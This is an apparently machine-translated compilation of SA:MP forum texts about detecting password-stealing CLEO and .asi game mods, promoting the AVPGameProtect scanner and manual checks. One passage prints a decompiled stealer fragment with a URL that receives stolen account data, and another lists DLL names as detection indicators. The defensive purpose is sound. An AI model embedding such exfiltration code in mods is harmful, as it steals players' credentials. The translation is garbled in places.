Preverite datoteko za stiller na spletu. Internetni vodič - vse najbolj zanimive stvari na internetu. Informacije o rezultatih iskanja



Prvi skener, ki se je pojavil že v času, ko je bil razvit prvi ASI styler. Takoj naslednji dan po pojavu stillerja sem začel razvijati svoj anti-steeler.

Optični bralnik vključuje naslednje module:
- podpisni motor YARA (zahvala programski ekipi Virustotal za tako zmogljivo orodje),
- skriptni mehanizem Andreasa Jonsona (AngelScript), hitrost, enostavnost vdelave in lepota podobnih skriptov v enem projektu. Zahvaljujoč njemu lahko hitro in tehnično odprete kriptorje za CLEO.
- Emulator kode SCM, ki lahko precej dobro promovira kriptorje CLEO (od mene)

Lastnosti programa:
- Precej obsežna baza tatvinov, ki raste približno od leta 2014. Zbrali smo kar nekaj zlonamernih modifikacij z več velikih in manj velikih spletnih mest.
- Možnost skeniranja map in datotek tako, da jih povlečete v okno programa.
- Zaključek kratke informacije O zlonamerna programska oprema(tip, vzdevek razvijalca in v starejših različicah baze vzdevki distributerjev)
- Skenirajte asi, dll, cleo, sf, cs in druge potenciale nevarne datoteke.
- Odkrivanje zlonamerne kode v datotekah s spremenjeno končnico, na primer, ne tako dolgo nazaj je bilo modno preimenovati stealers v txd datoteke in jih naložiti v igro z nalagalnikom.
- Razpakiranje šifriranih CLEO skriptov in naknadno skeniranje (opozoriti je treba, da dešifrira samo znane kriptorje in tiste, na katere smo naleteli, vendar je to dejstvo enostavno popraviti, samo nam pišite po e-pošti in pošljite datoteko). Ko skenirate nepakiran skript, lahko najdete izvor slednjega v datoteki temp\decrypt.cs.
- Sproti emulirajte kodo SCM in dešifrirajte skript, čemur sledi preverjanje zlonamerne kode. (Če je zaznana zlonamerna koda, glejte izpis v temp\decrypt.cs)
- Prijazen in intuitiven programski vmesnik.
- Visoka hitrost skeniranje pri preverjanju velikega števila datotek.
- Vgrajen pregled najdene datoteke v besedilnem in šestnajstiškem načinu

Še posebej pomembna točka! Vsak bi moral prebrati, da ne postavlja neumnih vprašanj.
Optični bralnik je zasnovan samo za preverjanje sprememb igre, razpakirane iz arhiva, v vsakem drugem primeru je neuporabno!
Tudi on NI namenjeno za namestitvene in samodejne namestitvene programe, pakete msi, exe, pif, mmbak, com, scr, vbs, bat, cmd, js in druge potencialno nevarne datoteke, ki jih ni mogoče najti v modifikacijah iger, za te datoteke obstajajo antivirusi!
tudi NE skenirajte celotnega sistema, je neuporabno in nima smisla. Ta optični bralnik je preizkušen in je namenjen samo modom. Lahko skenirate mapo igre, vendar morate tukaj razumeti, da ima igra datoteke, ki lahko dostopajo do interneta in so pripravljene za ogled v oknu optičnega bralnika.

Rad bi vas takoj opozoril, da ta program ne bo zaščitil vaših računov 100 %, kot kateri koli drug protivirusni program ali optični bralnik. Ko na naslovnici antivirusa napišejo 100% zaščito, je zame to že znak, da odstranim antivirus z diska. Toda ta optični bralnik lahko pospeši iskanje že znanih tatvin in vam pomaga preprečiti, da bi padli na vabo neizkušenih distributerjev.
večina najboljši antivirus- vaša glava in odločitve - prenesti ali ne prenesti. Prenesite modifikacije samo z zaupanja vrednih spletnih mest in kjer je nadzorovana varnost arhiva.


Avtor programa ne odgovarja za vaše odločitve in morebitne kradljivce, ki jih skener zgreši.

nekaj simboli programi:


Pozor! Zaznana je bila datoteka, ki lahko vzpostavi internetno povezavo, razmislite o tem, preden jo namestite v igro. Lahko pa gre tudi za samodejno posodabljanje skripta. V datoteki je mogoče imeti tudi URL. Vse je odvisno od vaše sposobnosti ročnega preverjanja datotek.

CLEO styler je bil najden, datoteka je bila razpakirana in lahko pogledate vir.

Skener je poskušal razpakirati skript, vendar morda ni deloval ali pa zlonamerne kode ni bilo mogoče najti. Glej vir v začasni mapi. Prepričajte se, da datoteka ni šifrirana. Tukaj morate ročno preveriti skript.

Najden CLEO stiller v odprti obliki.

Najdena je bila datoteka, ki prenaša zlonamerno programsko opremo na vaš računalnik

Najden je bil zatišnik iz razvpitega projekta

Zaščita najdena, datoteka lahko predstavlja grožnjo. Tukaj se morate zanesti le na poštenost in ugled avtorja. Vprašajte avtorja, zakaj je bila datoteka šifrirana (zaščitena), nato pa sami razmislite o ustreznosti odgovora. Ta datoteka je lahko nevarna.

Datoteko morda blokira druga aplikacija ali pa je datoteka ničelne velikosti

Ne priporočam vstavljanja takih datotek v igro. Tukaj se lahko pričakuje karkoli. To je združevanje več datotek v eno. Med temi datotekami je lahko tat ali druga zlonamerna programska oprema. Ne zaupajte lepilom. Da je lepljenje varno, se lahko prepričate le tako, da ga razvrstite v datoteke in preverite vsako datoteko posebej.


Vljudno vas prosimo, da program prenašate samo iz uradnih virov. To bo največ varna možnost.
O morebitnih napakah pišite po e-pošti ali v tej temi.


Za dinamično zaščito računa priporočamo uporabo posebnega vtičnika DarkP1xel.

Ta vtičnik blokira nevarne funkcije v skriptih in drugih modifikacijah.
Če imate ta vtičnik nameščen v igri, modi ne bodo mogli pošiljati spletnih zahtev strežnikom tretjih oseb, kar pomeni, da vaše geslo samp ne bo padlo v napačne roke, tudi če ste stealer pomotoma namestili v igra. Vtičnik vodi tudi podroben dnevnik vseh sumljivih dogodkov v igri. Pomembno. Vtičnik se nenehno posodablja, ostanite z nami.
p.s: ne pozabite se zahvaliti avtorju za vtičnik;)

Hvala vsem, ki ste nam pomagali.
Posebna zahvala Gedwadionu, DarkP1xel. To so kul fantje, ki imajo prihodnost v IT varnosti.

Avtorji:
smalloff - razvoj, podpora projektom
andre500 - testiranje, podpora projektom
Spletne strani avtorjev (uradni viri): spletno mesto Libertycity.ru
Pošta: smalloff@site
Prenos programa:AVPGameProtect18042019.rar
Razvijalca programa pogostite s pivom (hvala vnaprej): Yandex nefiltriran

(Pozor! Podpora javnemu projektu je popolnoma ukinjena.)

[Resen glas Chonishvilija]: Brez veliko besed. Jebi predstavo. Medtem ko to pišem, so vaš bilten in vilo na BB že pripojili k državi in ​​virtuale prenesli na napadalca, ah-ha-ha-ha, kašelj kašelj kašelj kašelj *zadušeno*

Lahko ohladite svoje prdce, ker datoteke cleo niso naložene na spletno mesto. Vendar to ne pomeni, da so prepovedani na projektu Samp-Rp. Ne daj se zmesti, prekleto!
Vsi ljubitelji modifikacij so se srečali s pojmom "Stiller" (alias Keylogger, a to je druga zgodba). Običajno jih stillers postavijo v cleo-skripte, o katerih bomo zdaj govorili.

Kaj je skript cleo?

Ne bom razlagal, kaj je cleo skript. splošni koncept, pojdimo naravnost k spletni igri. Cleo-skripte za SA:MP"a so zasnovane za izboljšanje udobja igre. Zahvaljujoč njim lahko spremenite vmesnik, ki vam ustreza. Popravite različne hrošče, zrušitve itd. Obstajajo pa tudi zlonamerni (ali goljufajoči) cleo -skripte (goljufija - prevara iz angleščine), ki so, mimogrede, strogo prepovedano v projektu Samp-Rp . Ustvarjeni so bili za otroke, ki jih je življenje užalilo in ki so bili v šoli tepeni. No, ne morete si kaj, da ne bi vstavili besedne zveze: "Chits so kot viagra, za tiste, ki tega ne zmorejo sami."
Najbolj znani cleo-skripti ( .c lev s cript datoteke) - to je indikator HP v številkah, kvadratni radar, skripta, ki poveča FPS, različne oblike oklepov in črte zdravja (včasih to niti niso samo črte, ampak vaš najljubši lik, npr. A$AP Rocky. Ko se HP zmanjša, fotografija izgine in ostane samo silhueta).
Veliko ljudi muči vprašanje, zakaj na spletnem mestu ni enb serije? Dejstvo je, da .asi formatu, to je tudi datoteka cleo, samo prevedena. Se pravi, vanj lahko všijete tudi styler.
Verjetno se sprašujete, zakaj pišem temo, če pa Cleo tako ali tako ni na strani. Vendar tega ni na spletnem mestu, a da bi ga vsebovali, potrebujete vsaj StreamMemFix1.0 .asi In to je le eden od številnih popravkov za GTA, ki jih je vsak ljubitelj črpanja svojega Sana poln Andreas mods do kapacitete in tako iz nje naredite sladkarije. In že molčim o c-huds in drugih modifikacijah. Vam je žal za račun? Potem je ta tema za vas!

Kako preveriti datoteko .cs za stilirnik?

Najpogostejši način je preverjanje prek programa Wireshark. Vse, kar potrebujete:

  • 1. Prenesite sam program (to lahko storite na uradni spletni strani).
  • 2. Oglejte si ta video, tam je vse jasno razloženo.

=====================================================================================================

Drugi način, kako preveriti Cleo za Stillerja. IN Najnovejša različica prihajajo cleo-knjižnice dodatne programe, eden od njih se imenuje Sončni graditelj- kar potrebujemo.


0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - stran, kamor se pošiljajo podatki o računu.
@stealer_by_mg 0 1@ je sam razvijalec stealerja.

=================================================================================================

Obstaja tudi tretji način za preverjanje datoteke za tatovino. Obstaja skript "steal_logger" .asi"Uporabili ga bomo za preverjanje.
(Da, sam je format cleo, vendar ni razloga za skrb, če ne mislite iti v bazo z njim). Ne bom vam dal povezave do njega, poiščite ga na internetu.
Na kratko bom razložil, kako ga uporabljati.

  • 1. Dajte ga v mapo igre.
  • 2. Pojdimo na kaj SA:MP strežnik, pod kaj nihče
  • 3. Izmislimo poljubno geslo, se prijavimo in zapremo igro.
  • 4. Ustvariti ga je treba v mapi besedilna datoteka (.txt format). Kliknite nanjo in v besedilu poiščemo vrstico z IP-jem našega strežnika in geslom za novo registrirani račun. Najden - to pomeni, da heker že ima te podatke. Naj bo srečen, ko se pride noter igrat z bičem. In v tem času brišemo zadnjo datoteko cleo.

[!] Uporabite kot ček samo na novo ustvarjenih računov, se ne prijavljajte v svoje glavne račune s tem skriptom. Po preverjanju izbrišite \ ali naredite ločeno kopijo GTA za preverjanje skriptov [!]

Kako preveriti, ali je v datoteki .asi stealer?

Lažjega dela je konec. Zdaj pa se naučimo preverjati .asi-files, ker styler v njih ne vidi Wiresharka. Kaj storiti? Objavil bom nekaj najbolj znanih metod.

večina učinkovita metoda preverjanja. Preverjanje preko programa IEInspector HTTP analizator.


===============================================================================================================

Drugi način je preverjanje kode z beležnico.

  • 1. Otvoritev .asi prek Beležnice.
  • 2. Poglejmo kodo.

Primer čistega kdaj (brez mirovalnika)

Primer kode z še vedno(ne kernel.dll)


Bodimo pozorni na zadnje vrstice.

Druga možnost za skritega kradljivca so imena v besedilu "urlmon.dll", "wininet.dl l", "wsock32.dll" v sami kodi. Ali vrstica " kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA NAPAKA NALAGALNIKA"

========================================================================================================

"Uprava ne obnovi izgubljenih računov"- rekli so.
"Varnost računa je v vaših rokah". Upam, da so po branju te teme vaše "roke gor" postale močnejše. Poskrbite za svoje račune.

2015-2015 © Zbrano iz različnih forumov.

AVPGameProtect je program, ki vam pomaga iskati zlonamerne datoteke v modifikacijah igre. glavna značilnost programi pred drugimi programi proti kraji - možnost množičnega skeniranja, tj. skenirate lahko absolutno vse datoteke in v poljubni količini, samo prenesite potrebne datoteke ali mapo z datotekami v okno programa in počakajte na rezultate skeniranja.

Lastnosti programa:
- Velika zbirka tatvin, ki se vzdržuje od leta 2014.
- Skenirajte asi, dll, cleo, sf, cs in druge potencialno nevarne datoteke.
- Visoka hitrost pri skeniranju velikega števila datotek.
- Prikaz informacij o kradljivcu v oknu programa (vrsta kradljivca ali vzdevek razvijalca).
- Vgrajen pregled najdenih datotek v besedilnem in hex načinu.
- Iskanje funkcionalnosti za interakcijo z internetom ali prenos datotek.
- Preverjanje skriptov CLEO za prisotnost stealerja (ne vseh, samo tistih s kriptorji, ki jih pozna program). Dešifrirani skript se prikaže v začasni mapi, v korenski mapi programa pod imenom decrypt.cs
- Prepis FuncCrypt od SR_Team in mnogih drugih.
- Stalna podpora programu.

Optični bralnik ni namenjen preverjanju namestitvenih programov in gradenj iger ali popolnemu pregledu računalnika. Če želite skenirati, morate mapo ali datoteke ekstrahirati iz arhiva in jih povleči v program.

Omeniti velja tudi, da program ne ščiti uporabnikov 100%. Kot kateri koli drug anti-stealer je namenjen le prepoznavanju znanih tat, nadaljnja odločitev o uporabi tega ali onega moda pa je neposredno vaša in avtor ni odgovoren za VAŠE odločitve. Program se bo nenehno dopolnjeval.

Nekatere programske konvencije:
InetLoader- Pozor! Zaznana je bila datoteka, ki lahko vzpostavi internetno povezavo, razmislite o tem pred prenosom. Lahko pa gre tudi za samodejno posodabljanje skripta.
CLEO_Stealer - CLEO styler je bil najden, datoteka je bila razpakirana in lahko pogledate vir.
CLEO_Crypter - Optični bralnik je poskušal razpakirati skript, morda ni deloval ali pa zlonamerna koda ni bila najdena. Glej vir v začasni mapi.
CLEO_Stealer- Najden CLEO stiller v odprti obliki.
Downloader_stealer- Našli datoteko, ki prenaša zlonamerno programsko opremo na vaš računalnik
Stealers_ru- Najden je bil zatišnik iz znanega projekta
Danger_VMProtect- Zaščita najdena, datoteka lahko predstavlja grožnjo
Skeniranje ni uspelo - Datoteko morda blokira druga aplikacija ali pa je datoteka ničelne velikosti
JoinFiles- Optični bralnik je ugotovil, da je več datotek združenih v eno. Med temi datotekami je lahko tat ali druga zlonamerna programska oprema.

Kako se lahko izognete temu, da naletite na tatu?!

Stealer je skript, ki se namesti s kopiranjem datoteke z zlonamerno kodo v mapo GTA. Po namestitvi bo vsakič, ko se prijavite v igralni strežnik, prebral vse vnesene podatke v dialogih (pin kode, geslo, skrivne ključe, podatke) in jih poslal napadalcu. Tako lahko s preprosto namestitvijo skripta v mapo GTA, če v pogovorno okno vnesete pravilne podatke, izgubite vse svoje račune za igre.

Vklopljeno ta trenutek Primeri kraje računov iger na različnih strežnikih Samp so postali vse pogostejši. Najpogosteje so to strežniki z načinom igranja vlog, saj ima valuta igre svojo vrednost. Napadalci služijo denar z vašo neumnostjo. V tem članku vam bom pokazal metode, ki jih poznam. Veste, ljudje, ki delajo te kradljivce, živijo po načelu "Če ne ješ, ne boš živel."

Osnovni nasveti:

1. Vedno uporabite vse metode za zaščito računa, ki vam jih je posredovala uprava projekta, v katerem igrate. (Grafična PIN koda, SMS vezava itd. Vse je odvisno od funkcionalnosti strežnika).
2. Uporabite čim daljše geslo in kompleksno strukturo.
3. Ne prijavljajte se v strežnik z geslom, ki ga uporabljate pri drugih.
4. Ne delite podatkov o svojem računu z osebo, v katero niste 100 % prepričani.
5. Ne svetujem vam, da v igri uporabljate različne modifikacije po meri. Lahko vsebujejo šifriran virus (Stiller). Stiller (iz angleščine ukrasti, ukrasti) je določen razred trojancev (zlonamerna programska oprema, virusi - karkoli želite), katerih funkcionalnost je v celoti sestavljena iz kraje gesel, shranjenih v sistemu, in njihovega pošiljanja "avtorju"
Ko namestite stealer mod, boste ob vstopu v igro vnesli svoje geslo in le-to bo uspešno prešlo v roke tatu. Najpogosteje vdelan v modifikacije, kot so (Hood, grafične nastavitve in vtičnik Asi).
6. Uporabljajte protivirusni program! Ne dovoljuje pošiljanja shranjene pošte ali računa na okužena mesta (zaščita pred grabežljivci in kraji (exe)).
7. Administracija strežnika SA:MP ne obnavlja vdrtih računov in ne vrača izgubljenega denarja ter nikoli ne bo zahtevala gesel za vaš račun.

Prvi način.

In tako je prva metoda 100% učinkovita!!!
Če ne prenašate raznih modifikacij, cleo skriptov, goljufij, potem ne boste imeli NOBENIH problemov in NOBENIH kradljivcev!

Preverite na spletni strani:

Prva metoda bo zaščitila pred vsemi vdori, vendar ni primerna za vsakogar.
In tako je druga metoda primerna za tiste, ki prenašajo skripte, različne modifikacije, nape, goljufije itd. Zato imam izhod za vas, vendar vas ne bo zaščitil 100%! Spletno mesto, ki preverja datoteke za različne skripte, točno tukaj . Z obiskom spletnega mesta lahko preberete "

Najnovejše različice kradljivcev imajo lahko formate .txd .dff .png .dat. Vendar so povezani v vtičnikih .asi .cs .sf in ne bodo delovali brez povezave. Zato preverite vse vtičnike in skripte z našim pregledovalnikom. Če imate v GTA skrite datoteke, jih izbrišite.


Iz tega sklepamo, da lahko zdaj stillerji navadno fotografijo vdelajo v modove, tudi v datoteko .png. Mnogi ljudje pravijo

"Ali si ovca ali kaj? Pojdi stran! Igram SA:MP že 5 let in vem, da so stealerji na voljo samo v modifikacijah ali formatih cleo!"

Fantov ni, kot lahko vidimo tudi na preprosti sliki, weapon.png recimo vem, morda tat! Vsak mod vedno preverimo, kako bi sploh nekomu zaupali. In tako, ko preverimo datoteko za zatilnik, če se prikaže

Informacije o rezultatih iskanja:

Kraja ni bilo mogoče najti:

Med pregledom datoteke ni bilo najdene zlonamerne kode ali karkoli sumljivega. To pomeni, da vam ni treba skrbeti za svoj račun, naš pregledovalnik uporablja vse možne metode odkrivanje zlonamerne kode v skriptih.

Lastnosti programa:
- Precej obsežna baza tatvinov, ki raste približno od leta 2014. Zbrali smo kar nekaj zlonamernih modifikacij z več velikih in manj velikih spletnih mest. Posebna zahvala spletnemu mestu Gtavicecity.ru za ponujene vzorce.
- Možnost skeniranja map in datotek tako, da jih povlečete v okno programa.
- Prikaže kratke informacije o zlonamernem programu (vrsta, vzdevek razvijalca in v starejših različicah baza podatkov distributerja)
- Skenirajte asi, dll, cleo, sf, cs in druge potencialno nevarne datoteke.
- Odkrivanje zlonamerne kode v datotekah s spremenjeno končnico, na primer, ne tako dolgo nazaj je bilo modno preimenovati stealers v txd datoteke in jih naložiti v igro z nalagalnikom.
- Razpakiranje šifriranih CLEO skriptov in naknadno skeniranje (opozoriti je treba, da dešifrira samo znane kriptorje in tiste, na katere smo naleteli, vendar je to dejstvo enostavno popraviti, samo nam pišite po e-pošti in pošljite datoteko). Ko skenirate nepakiran skript, lahko najdete izvor slednjega v datoteki temp\decrypt.cs.
- Sproti emulirajte kodo SCM in dešifrirajte skript, čemur sledi preverjanje zlonamerne kode. (Če je zaznana zlonamerna koda, glejte izpis v temp\decrypt.cs)
- Prijazen in intuitiven programski vmesnik.
- Precej preprost koncept programa, kar pomeni, da ga je mogoče enostavno in pogosto posodabljati.
- Visoka hitrost skeniranja pri skeniranju velikega števila datotek.
- Vgrajen pregled najdene datoteke v besedilnem in šestnajstiškem načinu

Optični bralnik je namenjen samo za preverjanje modifikacij iger, razpakiranih iz arhiva, v vseh drugih primerih pa je neuporaben.
Prav tako NI namenjen monterjem in samodejnim monterjem.

POZOR!!!
Želel bi vas takoj opozoriti, da ta program ne bo zaščitil vaših računov 100%, kot kateri koli drug protivirusni program ali skener. Ko na naslovnici antivirusa napišejo 100% zaščito, je zame to že znak, da odstranim antivirus z diska. Toda ta optični bralnik lahko pospeši iskanje že znanih tatvin in vam pomaga preprečiti, da bi padli na vabo neizkušenih distributerjev.
Najboljši antivirus je vaša glava in odločitve - prenesti ali ne prenesti. Prenesite modifikacije samo z zaupanja vrednih spletnih mest in kjer je nadzorovana varnost arhiva.

Nekatere programske konvencije:

V RAZVOJU

HttpAnalyzer je analizator omrežnega prometa. Če ste iskali funkcionalno orodje, katerega namen je spremljanje prometa HTTP in HTTPS v realnem času, potem mislim, da bi vam bil všeč ta program, je nekakšen vohalec, ki lahko jasno prikaže vse potrebne informacije o povezavah!

Na splošno lahko HTTP Analyzer naredi veliko stvari, mislim, da si lahko podrobneje preberete na uradni spletni strani, napisal sem glavno idejo.